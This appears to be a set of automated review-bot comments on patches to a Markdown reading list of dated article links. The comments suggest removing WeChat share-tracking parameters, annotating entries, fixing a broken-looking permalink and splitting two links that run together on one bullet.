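Review bot: in PATCH 322/332 the unchanged 2023/04/19 context line still carries WeChat share-tracking query parameters (`mpshare`, `scene`, `srcid`, `sharer_sharetime`, `sharer_shareid`) that appear to identify the share event rather than the article. Since this file is being touched anyway, consider trimming that URL from `&mpshare=` onward, or switching to the short `https://mp.weixin.qq.com/s/...` form that the entries added in PATCH 327 and PATCH 332 already use, so the public list does not publish the sharer's identifiers.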
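Review bot: in PATCH 325/332 the added 2023/06/04 entry is a general DNS question (CNAME records) going into `java日常/Readme.md` with no note on why it belongs in this list. A short bold annotation like the ones on neighbouring entries (`**todo**`, `**学**`) saying what it was read for would make the entry useful later, or it could move to a more general notes file if the repository has one.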
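Review bot: in PATCH 328/332 the added 2023/06/06 link has a path segment that begins with the literal text `title:%20`, which looks like blog front matter that leaked into the permalink, so the URL is likely to break if the post is regenerated. The link text already records the article title, which helps; consider also replacing the bare `**学习**` marker with one line on what the Cognito issue was, so the entry stays useful if the link dies.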
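Review bot: in PATCH 330/332 the rewritten 2023/06/16 line appends the CDN article as a second link on the same bullet, separated from the NGINX cache link only by a space, so the two render as one run of link text. Give the second article its own `+ 2023/06/16 [...]` bullet, or put an explicit separator between the links, to keep the list at one article per entry like the rest of the file.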